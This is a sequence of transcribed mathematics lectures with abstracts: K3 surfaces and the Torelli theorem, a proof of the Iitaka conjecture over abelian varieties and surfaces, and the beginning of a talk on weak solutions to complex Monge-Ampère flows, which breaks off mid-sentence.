One can establish an even more precise connection between the isomorphism and the isometry. [A long stretch of the recording here is unintelligible.] There are different ways to phrase the extra condition one needs: let us say that the Hodge isometry sends a Kähler class to a Kähler class, or, as one sometimes finds it, that it sends the Kähler cone to the Kähler cone; these formulations are equivalent. Such a Hodge isometry is called effective. The strong Torelli theorem then says: if sigma is an effective Hodge isometry from H^2(S', Z) to H^2(S, Z), then there is a unique isomorphism f from S to S' whose action on the lattices is exactly sigma, that is f* = sigma, and this isomorphism is uniquely determined by sigma. Conversely, if you look at the theorem, any time you have an isomorphism of K3 surfaces, its pull-back is a Hodge isometry with this property. The difference with the weak Torelli theorem is that there you only know that some Hodge isometry exists, and you cannot control where the Kähler class goes: the image of a Kähler class may lie in one cone and not go into the Kähler cone of the other K3.
In the weak Torelli situation one may have to apply some reflections to correct the isometry before getting the isomorphism; in the strong Torelli theorem you cannot do that, because you require from the start that a Kähler class goes again to the Kähler cone of the other K3. We will see applications of this strong Torelli theorem. It has many important applications, but for us let me just state the following remark: the Torelli theorem has an important, even fundamental, application in the study of the automorphisms of a K3 surface, Aut(S), the set of maps f from S to S which are biholomorphic (or biregular, if you want). Replacing S' by S in the theorem, it tells you that if you can construct Hodge isometries with some special properties, then you can say something about the automorphisms of the K3: knowing properties of lattices and of isometries of lattices gives you back properties of automorphisms of the K3.

I hope to start talking about automorphisms today, but first let me come back for a moment to the claim that, if you consider only projective K3 surfaces, the moduli space is 19-dimensional, and show you how one counts moduli. Let me convince you that 19 is the number of moduli one can expect for projective K3 surfaces; tomorrow in the exercise session you will do some exercises in this sense. So, some examples of dimension counting for K3 surfaces; it is a good exercise, and we do it with surfaces you already know, the quartic, the complete intersections of type (2,3) and (2,2,2), the double plane, and we will see that all these examples give 19-dimensional families. Take the quartics in P^3; the generic quartic is a K3, as in the easy example at the beginning. The space of quartics: a quartic in P^3 depends on h^0(P^3, O_{P^3}(4)) coefficients, and this dimension is the binomial coefficient, 5 times 6 times 7 divided by 6, which is 35. But if you consider all quartics you are not yet happy, because of course you can apply a projective transformation sending one quartic to another, and these should be considered equivalent. So we mod out by projective transformations: the group PGL_4(C) has dimension, as an algebraic group, 16 − 1 = 15; and if I take the projective dimension of the space of quartics, it is 35 − 1 = 34. So the number of moduli of quartics in P^3 is the dimension of this space, 34, minus 15, which very happily comes back to 19. One can do very similar computations for S_{2,3} in P^4, for the complete intersection S_{2,2,2} in P^5, and for the double plane over P^2, and one always gets 19. For Kummer surfaces one can also do a computation, but Kummer surfaces are not so generic: they have a large Picard number, because they contain a lot of curves, so their moduli space is much smaller, very special. But the general count always gives 19 moduli. After the break I will tell you a bit about the moduli spaces in these cases.
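In formulas, the dimension count just carried out for quartic K3 surfaces:
\[
\dim |\mathcal{O}_{\mathbb{P}^3}(4)| - \dim \mathrm{PGL}_4(\mathbb{C})
= \Bigl(\tbinom{7}{3}-1\Bigr) - (16-1) = 34 - 15 = 19,
\]
and the analogous counts for S_{2,3} in P^4, S_{2,2,2} in P^5 and the double plane branched over a sextic give the same number, 19.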
|
Aim of the lecture is to give an introduction to K3 surfaces, which are special algebraic surfaces with an extremely rich geometry. The easiest example of such a surface is the Fermat quartic in complex projective three-space. The name K3 was given by André Weil in 1958 in honour of the three remarkable mathematicians Kummer, Kähler and Kodaira, and of the beautiful K2 mountain in Kashmir. The topics of the lecture are the following: * K3 surfaces in the Enriques-Kodaira classification. * Examples; Kummer surfaces. * Basic properties of K3 surfaces; Torelli theorem and surjectivity of the period map. * The study of automorphisms on K3 surfaces: basic facts, examples. * Symplectic automorphisms of K3 surfaces, classification, moduli spaces.
|
10.5446/53775 (DOI)
|
Okay. Thanks a lot for the invitation. Today I will explain a joint work with Mihai; it is essentially an application of the positivity of direct images which he explained before. To begin with, in the first part, the introduction, I will explain a little bit what the Iitaka conjecture is, and after that I will explain our main theorems. First let me recall the definition of the Kodaira dimension. Assume X is a projective manifold defined over C (everything also holds in the compact Kähler case). The Kodaira dimension kappa(X) is defined as follows. If no tensor power of the canonical bundle of X has a non-zero global section, we define kappa(X) = −∞. If not, kappa(X) is defined as the largest number d such that, when we divide the dimension of the space of global sections H^0(X, K_X^m) by m^d, the resulting quantity does not tend to zero. One very simple remark: by this definition it is easy to see that kappa(X) takes values in {−∞, 0, 1, 2, ..., dim X}. Another remark: if we replace the canonical bundle K_X by a holomorphic line bundle L over X, the same definition gives kappa(X, L), which we call the Iitaka dimension of the line bundle L.

Now I can explain what the Iitaka conjecture is. Let p: X → Y be a fibration (I will explain in a moment what fibration means) between two projective manifolds X and Y. By fibration I just mean that p is projective, surjective, and its fibers are connected; since X and Y are smooth, the general fiber F is a smooth connected manifold. The Iitaka conjecture states the subadditivity of the Kodaira dimension: it is conjectured that kappa(X) is at least kappa(Y) + kappa(F), where F is the general fiber of the fibration p. There are a lot of works about the Iitaka conjecture; here I mention just a few. In the case where the base Y has dimension one, it was solved long ago, forty years ago, by Kawamata. Another extreme case is when the fiber F is of general type, meaning that kappa(F) is maximal: this case was solved by Kollár, and there is also another proof by Viehweg. In the case where F is of log general type, the conjecture was also solved, recently, by Kovács and Patakfalvi.
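In symbols, the definition and the conjecture just stated (my write-up):
\[
\kappa(X)=\max\Bigl\{d\;:\;\limsup_{m\to\infty}\frac{h^0(X,mK_X)}{m^d}>0\Bigr\},
\qquad \kappa(X):=-\infty \ \text{ if } h^0(X,mK_X)=0 \ \text{ for all } m\ge 1,
\]
\[
\text{(Iitaka conjecture)}\qquad
\kappa(X)\;\ge\;\kappa(Y)+\kappa(F)
\quad\text{for a fibration } p\colon X\to Y \text{ with general fiber } F.
\]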
There is also another very important result, due to Kawamata. It says that if F admits a good minimal model, meaning that the fiber is birationally equivalent to a variety whose canonical bundle is semi-ample, then the conjecture holds; in particular, the abundance conjecture implies the Iitaka conjecture. (There is also a simpler proof of this result by [name unclear in the recording], and there is earlier related work due to Chen and Hacon.)

Now I can explain our result. Let p: X → Y be a fibration between two projective manifolds, and let (X, Delta) be a klt pair, with Delta an effective divisor on X. If the base Y is an abelian variety (projective), then we prove that kappa(X, K_X + Delta) is at least kappa(F, (K_X + Delta)|_F) + kappa(Y), where the restriction is to the general fiber; and in this case, since Y is an abelian variety, kappa(Y) is in fact equal to zero. By the same kind of arguments developed in our paper we can also prove another result: if the base Y has dimension equal to two, then the same inequality holds, which improves a little bit the result of Kawamata. [In answer to a question from the audience, partly inaudible:] since kappa(Y) = 0 here, the statement says that kappa(X, K_X + Delta) is at least the Iitaka dimension of the restriction of the pair to the general fiber; and if we add a pair, it has more sections.
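For reference, the main statement just described, written out (my formulation of what is on the board):
\[
(X,\Delta)\ \text{klt},\quad p\colon X\to Y\ \text{a fibration},\quad Y\ \text{an abelian variety (or } \dim Y=2\text{)}
\;\Longrightarrow\;
\kappa\bigl(X,K_X+\Delta\bigr)\;\ge\;\kappa\bigl(F,(K_X+\Delta)|_F\bigr)+\kappa(Y).
\]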
The proof of our result is based on the positivity of the relative canonical bundle, which was already explained in the talks of Mihai, so in the second part I just recall briefly what he explained: the positivity of the relative canonical bundle and the positivity of the direct image. Here we take an integer m, say m at least 2, and we assume that the direct image p_*(m(K_{X/Y} + Delta)) is not equal to zero; that just means that for a generic point y of Y the corresponding space of sections on the fiber is non-zero. From now on, for reasons of simplicity, we just assume that the pair Delta is equal to zero; in the general case the proof is essentially the same. In this case, the non-vanishing of the direct image just means that H^0(F, mK_F) is not zero: we have at least one section on the generic fiber. In this situation, and thanks to the work of Berndtsson and Păun which was already explained in his course, one can find the so-called m-relative Bergman kernel type metric, which I write h_B, on the relative canonical bundle K_{X/Y}; it may be a singular metric, but its curvature is semi-positive on the total space X in the sense of currents. Let me also recall one point of the set-up: by definition, the restriction of this metric to a generic fiber is constructed from the sections of mK_F on that fiber.

I also need another result, proved by Păun and Takayama in their paper. Still in this setting, take L to be the (m−1)-st tensor power of the relative canonical bundle, equipped with the metric h_B tensored (m−1) times. Let Y_1 in Y be the locally free locus of the direct image p_*(K_{X/Y} + L) = p_*(mK_{X/Y}); a priori this direct image is just a coherent sheaf, so we take the locus where it is locally free, and its complement has codimension at least two in Y. Let Y_0 in Y be the smooth locus of the fibration p, that is, the set of points whose fiber is smooth; Y_0 is in fact contained in Y_1. Then they prove the following: there is a possibly singular Hermitian metric H on the direct image p_*(mK_{X/Y}), related to the Narasimhan-Simha metric, defined over the locally free locus Y_1, such that H is not necessarily smooth, but it is bounded on Y_0, and it is positively curved in the sense of Griffiths on Y_1.

Let me explain a little bit the construction of H. Let y be a point of Y_0. The fiber of the direct image at y is just H^0(X_y, mK_{X_y}), so we have to define a metric on this space. How do we define it? We take a section s there and define the norm of s at y as the integral over the fiber X_y of |s|^2 measured with respect to h_B tensored (m−1) times; the integrand is then a volume form on the fiber, and by the construction of the Bergman kernel type metric it is easy to check that this integral is finite. This shows that the metric H is indeed bounded on Y_0. After that, one can prove that H extends as a possibly singular metric on Y_1.
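In formulas, the fiberwise L^2 metric just described is (my notation; s a section of the direct image at y, i.e. s in H^0(X_y, mK_{X_y})):
\[
\|s\|^2_{H,y}\;=\;\int_{X_y}|s|^2_{\,h_B^{\otimes(m-1)}},
\]
which is finite by the construction of the relative Bergman kernel type metric h_B, so that H is bounded on the smooth locus Y_0.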
By construction, |s|^2 measured with h_B^⊗(m−1) is a volume form on the fibre, and by the construction of the Bergman kernel type metric it is easy to check that this integral is finite; therefore this metric is indeed bounded on Y_0. After that, we can prove that the metric extends as a possibly singular metric on Y_1. The notion of being weakly positively curved means the following: for every topological open set U in Y_1 and every section s of the dual of this vector bundle over U — so we take the dual metric — the function log |s| is a psh function. Note that Y_0 might be a strict subset of Y_1; by the construction the metric h is only known to be bounded on Y_0, and on the complement inside Y_1 it might be infinite, but the definition still makes sense. One more remark: in the case where h is a smooth hermitian metric, this notion is equivalent to saying that the metric is positively curved, i.e. Griffiths semi-positive. That is the explanation of the result of Păun and Takayama. As a corollary, by using a result of Raufi, we know that in this case the induced metric — which we write det h — on the determinant of the direct image (of rank one, so after taking the double dual it is a line bundle on Y) has curvature which is semi-positive in the sense of currents on the total space Y. Now I will explain two propositions which will be crucial in the proof of our results. Proposition 1: still under the construction above, let U be some topological open set in Y, not necessarily contained in Y_1, and suppose that the curvature of the determinant of the direct image, with the metric det h, is identically equal to 0 on U. Then we can prove that the direct image, with respect to h, is hermitian flat: it is a hermitian flat vector bundle on U, not only on U ∩ Y_1. I do not have enough time to explain the proof, so I just explain the idea in case 1, where h is smooth; in this case the proof is very simple.
If h is a smooth hermitian metric, it is very elementary to see that the curvature of the determinant is just the trace of the curvature of the direct image on U ∩ Y_1. Now assume that this curvature of the determinant is identically 0. Since, thanks to the result of Păun and Takayama, the curvature of the direct image is Griffiths semi-positive, a semi-positive form with vanishing trace must vanish, and this implies that the direct image is hermitian flat on U ∩ Y_1. After that, using a little more argument, and the fact that the complement of Y_1 has codimension at least two, we can prove that it is in fact hermitian flat on the whole open set U; I have no time to explain this last point. To prove our result we also need another proposition, which is essentially due to Viehweg; we follow a known argument. Recall that in the talk of Mihai it was proved that if the direct image f_*(mK_{X/Y}) is not zero, then the relative canonical bundle K_{X/Y} is pseudo-effective: we can find a possibly singular metric on it which is semi-positive in the sense of currents on X. In Proposition 2 we want to compare the positivity of the relative canonical bundle with the positivity of its direct image; it says that the relative canonical bundle is in fact more positive than the direct image. More precisely: still in this setting, we can find some small ε > 0, which depends on m, and a divisor E on X which is in fact very small — its image in Y has complex codimension at least two — and, more importantly, such that mK_{X/Y} + E is bigger than ε times the pullback of the determinant of the direct image: the determinant lives on the base, so we take this line bundle, pull it back to the total space X, and the difference of the two classes is pseudo-effective on X. In particular, if the determinant is a big line bundle on the base, the proposition implies that the relative canonical bundle, modulo modifications, is strictly positive in the horizontal directions. In fact the divisor E here is harmless: because its image in Y has codimension two, when we prove the Iitaka conjecture it is easy to get rid of it.
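In symbols, Proposition 2 as described above reads roughly as follows (a sketch; ε and E are exactly the objects just introduced):
\[
mK_{X/Y} + E \;-\; \varepsilon\, f^{*}\!\det f_{*}\bigl(mK_{X/Y}\bigr)
\ \text{ is pseudo-effective on } X,
\qquad
\operatorname{codim}_Y f(E)\ \ge\ 2 .
\]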
Now, for the third part, I will explain the proof of our theorem; we treat the result in two cases. Let f : X → Y be a fibration between two projective manifolds, and consider first case 1, where Y is an abelian variety. In this case we need to prove that the Kodaira dimension of X is at least the Kodaira dimension of the fibre, because Y is an abelian variety and so κ(Y) = 0. Namely, we want to construct a lot of sections: since Y is an abelian variety its canonical bundle is trivial, so mK_{X/Y} is just mK_X, and therefore, to prove the Iitaka conjecture, we just want to find a lot of global sections of the direct image f_*(mK_X). Thanks to the result above we already know that we can find a positively curved singular metric on it; now we want to construct a lot of global sections. Step one is a simplification: we would like to show that we can assume that Y is a simple torus, meaning that there is no non-trivial subtorus in Y. Why can we assume this? The reason is that the inequality is in fact invariant under finite étale cover: if Y_1 → Y is a finite étale cover, with no ramification locus, and X_1 is (a resolution of) the fibre product X ×_Y Y_1, then if we can prove the inequality for the fibration X_1 → Y_1, it implies the inequality for X → Y. This fact is well known. (In answer to a question from the audience: since the cover is étale, with no ramification locus, the Kodaira dimensions are unchanged; this is in the literature.) Using this, if Y is not a simple torus, then by Poincaré's reducibility theorem, after some finite étale cover — and a finite étale cover of a torus is again a torus, so the Kodaira dimension does not change — Y can be written as a product of two subtori. In that case the fibration, composed with the projection to one of the two factors, gives another fibration onto a torus of smaller dimension, and the inequality can then be proved by induction on the dimension of the base Y. The advantage of this reduction is the following: once Y is a simple torus, for every pseudo-effective line bundle L on Y there are only two possible cases.
Namely, either L is topologically trivial, meaning that its first Chern class vanishes, or L is ample. This dichotomy is quite easy to check, but I have no time to explain it; that is the advantage of the assumption. Now, for step two, we can use the result of Păun and Takayama: applying their result, the direct image f_*(mK_X) is positively curved on Y_1, and, by the result of Raufi, the determinant line bundle is semi-positive in the sense of currents on the total space Y; in particular it is pseudo-effective. By step one, this pseudo-effective line bundle is therefore either topologically trivial or ample, so there are essentially two cases to check. Step three: the case where the determinant is topologically trivial. If the first Chern class of the determinant is zero, then the semi-positive current representing it lies in the zero class, so it is identically zero; that means the curvature of the determinant of the direct image is identically zero on the total space Y. Now we are in a position to apply Proposition 1: the direct image is in fact a hermitian flat vector bundle on Y. Once we know this, since Y is an abelian variety its fundamental group is abelian, and a hermitian flat bundle corresponds to a unitary representation of this fundamental group; since the group is abelian, the representation splits, so the direct image splits as a direct sum of numerically trivial line bundles on Y, where r is the rank of the direct image — here we use the fact that the fundamental group is abelian and that the summands are numerically trivial. Then, by using a result of Campana and Peternell, which is based on a result of Simpson, and the fact that the direct image is numerically trivial, we can construct a lot of global sections, and this implies that κ(X) is at least κ(F). I am sorry that I do not have enough time to explain this last step, but it is essentially based on the result of Campana and Peternell.
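The outcome of Step 3 just described can be summarized as follows (a sketch; r denotes the rank of the direct image, and the L_i are the flat line bundles coming from the characters of the abelian group π_1(Y)):
\[
f_{*}\bigl(mK_{X}\bigr)\;\cong\;\bigoplus_{i=1}^{r} L_i,
\qquad c_1(L_i)=0 \ \text{ for every } i .
\]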
Now I explain the last step, step four. We have already explained that, since we assume Y to be a simple torus, the determinant of the direct image is either a topologically trivial line bundle or an ample line bundle; so we are now in the second case and we need to apply the second proposition. In this case, the determinant being ample, Proposition 2 implies that mK_{X/Y} + E is bigger than ε times the pullback of an ample, hence big, line bundle. As we explained before, since the image of E has codimension at least two — it is a small divisor — there is a standard method to get rid of this small divisor, so for simplicity we just assume that E = 0. Since the determinant is ample, this implies that the canonical bundle is strictly positive in the horizontal directions. Then, by using the relative Bergman kernel metric and, essentially, the Ohsawa–Takegoshi extension theorem, we can prove that, for another m large enough, the restriction map from the global sections of mK_X to the sections over a generic fibre is surjective; and this implies that κ(X) is at least κ(F). I have one minute left, so let me explain a little the idea of the proof in case two, when Y is a surface. In this case it is quite easy to check that the statement is invariant under birational equivalence, so we can run the MMP on Y; in particular we can assume that the canonical bundle of Y is semi-ample. If the Kodaira dimension of the base is at least one, then the result is well known, due to the result of Viehweg, so the only interesting case is when the Kodaira dimension of the base equals zero. In that case, since we assumed Y minimal, after some finite étale cover Y is a torus or a K3 surface. The case where Y is a torus is already proved. In the K3 case, we still study the determinant of the direct image, which is a pseudo-effective line bundle on Y. When Y is a K3 surface and the line bundle is pseudo-effective, by using the Zariski decomposition, the Kawamata–Viehweg vanishing theorem and Riemann–Roch, it is easy to check that its Kodaira dimension equals its numerical dimension. If this Kodaira dimension is at least one, then by following almost the same proof as above we can prove the Iitaka conjecture. The difficult case is when the Kodaira dimension equals zero, which just means that the numerical dimension is zero as well. In that case, by the Zariski decomposition, the determinant of the direct image is numerically equivalent to a divisor supported on exceptional curves — in fact on (−2)-rational curves.
And by using a result of Campana, we can prove that the fundamental group of the complement of this exceptional locus is in fact very simple, so by following almost the same proof as in step three we can also prove the Iitaka conjecture in this case. That finishes the proof. Thank you.
|
Let f:X→Y be a fibration between two projective manifolds. Iitaka's conjecture predicts that the Kodaira dimension of X is at least the sum of the Kodaira dimension of Y and the Kodaira dimension of the generic fiber. We explain a proof of the Iitaka conjecture for algebraic fiber spaces over abelian varieties or projective surfaces.
|
10.5446/53776 (DOI)
|
Thank you, and thank you for the invitation — I am very grateful for this opportunity to speak here. I will report on recent joint work with Chinh Lu from Orsay and with Ahmed Zeriahi from Toulouse, who is in the audience. We are trying to develop the first steps of a parabolic pluripotential theory. We posted two papers on the arXiv last October; both are quite long and a bit technical — close to 60 pages each — so I am not going to explain all of them by far, but I will try to focus on the one that deals with the compact setting, which is a bit easier to explain. What we try to do is to understand complex Monge-Ampère flows, especially the case of the Kähler-Ricci flow, by means of pluripotential techniques; so we try to define and understand weak notions of solutions to these flows. There are basically two natural approaches. One is approximation by smooth flows together with a priori estimates; this is the path I am going to explain today. The other, which is quite useful as well but a bit more technical to explain, is the Perron technique of envelopes of weak sub-solutions; I will skip it today, but its inspiration nevertheless lies behind what I am going to explain. The main motivation is the study of the Kähler-Ricci flow, ∂ω_t/∂t = −Ric(ω_t). We try to understand this evolution equation, not only on smooth manifolds: one tries to run it for as long as one can and then to extend the definition of the flow once finite time singularities are reached, and very soon one needs to understand this object on mildly singular varieties. It is actually quite common to study the so-called normalized Kähler-Ricci flow, ∂ω_t/∂t = −Ric(ω_t) − λω_t, where λ is a real parameter whose sign, with this way of writing things, is the sign of the first Chern class of the canonical bundle of the manifold. At the level of cohomology classes, if α_t denotes the class of the Kähler form ω_t, then α_t solves a very simple ODE, so from it and from the initial Kähler class that you give yourself you know the family of classes α_t explicitly. We can then pick a smooth representative θ_t of the fixed class α_t, and solving this nonlinear equation turns out to be equivalent to solving the following complex Monge-Ampère flow: a parabolic scalar equation for an unknown function φ_t, where n is the complex dimension of the manifold, dV is a fixed volume form on the manifold, h is a fixed smooth function, and φ_t is assumed to satisfy the positivity property that θ_t + i∂∂̄φ_t is a positive form. It is a well-known fact, particular to Kähler geometry, that solving this Kähler version of the Ricci flow, or its normalized version, is actually equivalent to solving a complex Monge-Ampère equation at the scalar level: rather than having an unknown tensor, you end up with an evolution equation for an unknown scalar function. That is the kind of equation I am going to focus on.
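Written out, the normalized flow and the scalar equation just described take roughly the following form (a sketch reconstructed from the verbal description above; the exact normalizations of h and dV are the ones fixed on the board):
\[
\frac{\partial \omega_t}{\partial t} = -\operatorname{Ric}(\omega_t) - \lambda\,\omega_t,
\qquad
\bigl(\theta_t + i\partial\bar\partial\varphi_t\bigr)^{n}
 = e^{\,\partial_t\varphi_t + \lambda\varphi_t + h}\, dV,
\qquad
\theta_t + i\partial\bar\partial\varphi_t > 0 .
\]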
But, as I mentioned, it is also extremely important to understand this type of equation on mildly singular varieties, so the precise setting will be the following. Let us assume that the underlying variety V may be singular. It still makes sense to consider such an evolution equation, and in order to understand the corresponding complex Monge-Ampère flow we fix a resolution of singularities and lift the problem to the smooth manifold X; the corresponding flow then transforms into the same type of complex Monge-Ampère flow, with two changes. The function F on the right-hand side looks similar to what we had before, say F = h̃(t, x) + λφ_t, so this has not changed much; but there is a new object, a density g, which is a quotient of squared norms of holomorphic sections of some line bundles, and the zeros and poles of those sections correspond to the nature of the singularities you started with. So this density g has both poles and zeros, but the important point from an analytic point of view is that you nevertheless end up with a density which is L^p-integrable; this is one possible meaning of the fact that the singularities you are dealing with are mild. The other difference is that the reference form has been lifted: ω_t is the pullback of a form η_t, where η_t was a Kähler form on the variety V, so ω_t is no longer strictly positive — it has degeneracies above the singular locus of the variety you started with. So you have a lack of positivity of the reference form, and you also have some analytic difficulties coming from the density g. In the sequel I will focus on this general form of complex Monge-Ampère flows, and I would like to make sense of weak solutions to this flow in the sense of pluripotential theory. The first hint that we follow is that, rather than working on the manifold X, we work on X_T := (0, T) × X, which is a real manifold of dimension 2n + 1; here T is the maximal existence time for this flow. We want to understand the equation on X_T: we are going to interpret both sides of the equation as positive measures on X_T, and try to make sense of both the left-hand side and the right-hand side in the sense of measures. The left-hand side is the easiest one to deal with; the delicate part is the complex Monge-Ampère operator, which was studied in the late seventies by Bedford and Taylor, and they propose a very convenient definition of this operator. It applies as soon as, for all t, the map x ↦ φ_t(x) is ω_t-plurisubharmonic and bounded. So I will impose that my objects are locally bounded and that they have this plurisubharmonicity property, which means, by definition, that φ_t is ω_t-plurisubharmonic if and only if, writing locally ω_t = i∂∂̄u_t for some local potential u_t, the function φ_t + u_t is plurisubharmonic. So the first condition we impose is that the function φ(t, x) can be thought of as a bounded family of ω_t-plurisubharmonic functions. If you do so, then by Bedford–Taylor theory the measure (ω_t + i∂∂̄φ_t)^n is well defined on X for each fixed t as a positive measure, and you then average it with respect to the Lebesgue measure in time, which gives a nice, well-defined positive measure on X_T. That is it for the left-hand side. And maybe I should emphasize that we have very good convergence properties for the operator φ ↦ dt ∧ (ω_t + i∂∂̄φ_t)^n.
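To fix notation, the left-hand-side measure just described is the following (a sketch; the time slices are understood via Bedford–Taylor theory and then integrated against Lebesgue measure in t, as explained above):
\[
\mathrm{LHS}(\varphi)\;=\;dt\wedge\bigl(\omega_t + i\partial\bar\partial\varphi_t\bigr)^{n}
\quad\text{as a positive measure on } X_T=(0,T)\times X .
\]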
I forgot to mention that, of course, both in theory and in practice you can almost never compute these objects exactly: what you do is approximate them by smooth ones, and you want to be able to pass to the limit in the approximation process. So it is crucial in this weak theory to have reasonably good convergence properties, and in the Bedford–Taylor setting there are tons of such continuity properties: for instance, if you have approximants that converge uniformly, then you can pass to the limit inside the Monge-Ampère operator. There are many other properties, but let us stick to this one for the time being. Now I would like — and this is perhaps a bit newer — to make sense of the right-hand side. What do we have on the right-hand side? Something reasonably nice and independent of time, and then this time derivative that shows up. Something quite natural is to assume that t ↦ φ_t(x) is, say, locally Lipschitz, uniformly in the space variable; then ∂_tφ is well defined almost everywhere, and therefore you can make sense of the right-hand side in the Lebesgue sense: plugging in the rest of the picture, you end up with an almost everywhere well-defined density, hence a well-defined right-hand side. A first naive observation is that you might hope to produce estimates showing that your objects are indeed locally Lipschitz in time — and we will do so — but there is a problem: this is not sufficient to pass to the limit in approximation processes. So we actually ask for more, namely we wish our solutions to have some concavity property in time: we want t ↦ φ_t(x) to be semi-concave, locally uniformly in (0, T) × X. Indeed — forgetting about the "semi" for a moment — if you have a sequence of concave functions that converges pointwise, then the time derivatives also converge; so the convergence properties are guaranteed if you can make sure that your objects have concavity properties in time. One last remark: we should not ask for the Lipschitz property or the concavity property all the way down to time 0, because, as you may know for the heat equation — and the same holds for the Kähler-Ricci flow or complex Monge-Ampère flows — these flows have very strong smoothing properties: you can start from an initial datum which is poorly regular, and the flow will tend to smooth it out. So it is natural to expect good regularity in time for positive time, but you should not expect good regularity in time up to time 0; "locally" here means that the uniform estimates stop before time 0. Okay, so that is the definition of the left-hand side and of the right-hand side; what can we do with this?
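Before the statement of the theorem, the weak formulation just described can be recorded in one line (a sketch; both sides are understood as positive measures on X_T, with ∂_tφ_t defined almost everywhere as above):
\[
dt\wedge\bigl(\omega_t + i\partial\bar\partial\varphi_t\bigr)^{n}
\;=\;
e^{\,\partial_t\varphi_t + F(t,x,\varphi_t)}\,g\,dV\,dt
\qquad\text{on } X_T .
\]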
The theorem I would like to explain is the following. Assume that F is continuous in the three variables (t, x, r); assume moreover that it is quasi-increasing in the last variable r, and locally semi-convex in (t, r) — these are the assumptions on F. Assume that g is in L^p for some p bigger than 1, as in the example above, and that the set where g vanishes has volume zero. Finally, assume that you pick an initial datum φ_0 which is ω_0-plurisubharmonic and, say, bounded to start with. Then there exists a unique φ which solves the problem with the appropriate regularity, namely: first, for all t, the map x ↦ φ_t(x) is ω_t-plurisubharmonic on X, and φ is bounded — you cannot get boundedness up to time T, but it is bounded on (0, T′) for every T′ slightly smaller than T, so it is locally but essentially bounded; second, t ↦ φ_t(x) is locally uniformly semi-concave; third, φ solves the complex Monge-Ampère flow in the sense I just explained; and fourth, φ_t converges to φ_0 as t goes to 0, say in L^1. So with this type of regularity, and with this definition of weak solution, there is a unique weak solution of such complex Monge-Ampère flows. (Question: is T the maximal time for which ω_t is a Kähler class?) Well, you give yourself data like this — you also need F to be well defined — and if your data are well defined on this interval then you can solve the problem like this; of course you have in mind that, for the Kähler-Ricci flow, T will tend to be the maximal cohomological existence time. Before explaining the proof of this result, I would like to mention a few earlier works and stress some differences. One comment, maybe more for the experts: the convergence we get at time 0 is actually quite strong. I stated the weakest one, which is sufficient to get uniqueness of the solution, but as we will see at some point in the proof the convergence holds in a reasonably strong sense — in capacity, for those who know what it is — and if you start with a φ_0 which is continuous, the convergence is actually uniform. So there is strong information on what happens at time 0, but for this statement, and especially for the uniqueness, which is quite delicate, L^1 convergence at time 0 is sufficient. Now a comment on previous works, which actually motivated this one. First, there is an important work by Song and Tian; it was published only recently, but the paper goes back to ten years ago. They develop weak solutions in similar contexts, but they ask the variety V to be algebraic — there is a projectivity assumption in the process which is actually unnecessary — and, perhaps more importantly, they prove strong regularity on the regular part of V; but since this is very demanding, the method is not very flexible. So, besides the fact that it is natural to expect this kind of technique to be applicable in the Kähler context, and even though the techniques they propose are quite interesting and produce stronger results, they are not very flexible, and it is important to develop softer tools. This is something we had been doing with Philippe Eyssidieux and Ahmed Zeriahi some time ago, and I should add that part of the work was completed by our PhD student Tô in the last few years: in these works we developed a parabolic viscosity theory, a rather different approach which also produces weak solutions. Here the drawback is the assumption we need to make on the density g which, with these notations, appears in the equation above.
Namely, for the viscosity technology to work we need data which are continuous; in particular the density g, which causes the trouble, has to be continuous, not merely L^p — a bit more demanding than that. For instance, for the application to the study of the Kähler-Ricci flow, it implies that the singularities you can deal with are canonical; and there is an important class of singularities that show up in the minimal model program, the so-called terminal singularities, which are not covered by that approach, while the one we propose today applies to the most general singularities encountered in the classification of algebraic varieties. Finally, a last comment on previous works — there have been works by many authors; let me mention a work by Peter Topping from a few years ago, and a definitive work by Di Nezza and Lu, which essentially shows that you can start from a very arbitrary initial datum: the initial datum, which I denoted by φ_0, can be almost arbitrary. In this presentation I asked the initial datum to be bounded, but this hypothesis can be relaxed by far — this is work that Eleonora Di Nezza and Chinh Lu have done — and it could also be done here, but it brings some extra difficulties that we hide under the carpet. Okay, so the goal now is to give you a few hints on the proof of this result, and the technique will not be a surprise if you have been following carefully the lectures by Gabor: you approximate by smooth flows and you try to prove a priori estimates — that was the main hint in Gabor's first lecture, and this is exactly what I propose to do. So let me write it that way. Let us assume, just for now, that ω_t is an honest Kähler form, that F is a smooth function, and that g is a smooth and positive function. In practice this means that there will be indices and approximations: F_j will be a family of smooth functions converging uniformly to F, which is merely continuous; ω_t will be replaced by ω_{t,j}, which is ω_t plus some extra positivity, et cetera. But the notation would be awful, so I skip that and focus on proving a priori estimates for these approximants without too many indices. The claim will be the following: first, in this context, with the initial datum φ_0, the function φ(t, x) is uniformly bounded on [0, T − ε] × X; second, t times ∂_tφ is bounded by another constant; and lastly, the second time derivative is also under control, in the following sense: t² times the second time derivative of φ is bounded above by a third constant on [0, T − ε] × X. That is the goal; and once again you should imagine that there is an extra index j of approximation, and of course all the constants you end up with in the statement are independent of j. How to prove this? Let me give some hints, and let us look at the first estimate, which is the easiest. It relies on Yau's solution to the Calabi conjecture, plus an extension due to Kołodziej and to a paper that has already appeared in previous lectures. Let me fix some notation and a uniform bound: I have not been precise on the assumptions on the family of forms, and the precise assumption that we actually need will show up for each estimate.
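For reference, the three a priori bounds just stated can be written as follows (a sketch; the constants C_0, C_1, C_2 depend on ε but not on the approximation index j):
\[
\sup_{[0,T-\varepsilon]\times X}|\varphi|\le C_0,
\qquad
\sup_{[0,T-\varepsilon]\times X} t\,|\partial_t\varphi_t|\le C_1,
\qquad
t^{2}\,\partial_t^{2}\varphi_t\le C_2 \ \text{ on } [0,T-\varepsilon]\times X .
\]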
For the first estimate we need a uniform bound on the family of forms: it is cheap, and given for free, to bound this family of semi-positive forms from above by a fixed Kähler form, uniformly in time; what is more demanding is a positive lower bound which is uniform in time. So fix such reference forms θ_±. By Yau's solution to the Calabi conjecture you can then fix potentials ρ_± for these forms, solving the Monge-Ampère equations (θ_± + i∂∂̄ρ_±)^n = c_± g dV. You cannot solve exactly with right-hand side g dV because of mass constraints, but you can adjust by a fixed constant c_±, which guarantees that the masses of the left-hand side and of the right-hand side are the same; once you do that, there is a unique such solution up to normalization. For the plus sign this is really Yau's solution; for the minus sign, because the form has the tendency to degenerate — it is not really Kähler — this is essentially the work of Kołodziej and the one mentioned in previous lectures. If you do that, then you observe, for instance, that u_+(t, x) := ρ_+(x) + Ct + C′, for suitable constants C and C′, is greater than or equal to φ_t(x). Let me say one word about how to justify this. The observation is that φ is a sub-solution to the flow (θ_+ + i∂∂̄v_t)^n dt = e^{∂_t v + F(t,x,v)} g dV dt: indeed (θ_+ + i∂∂̄φ_t)^n is greater than or equal to (ω_t + i∂∂̄φ_t)^n, because 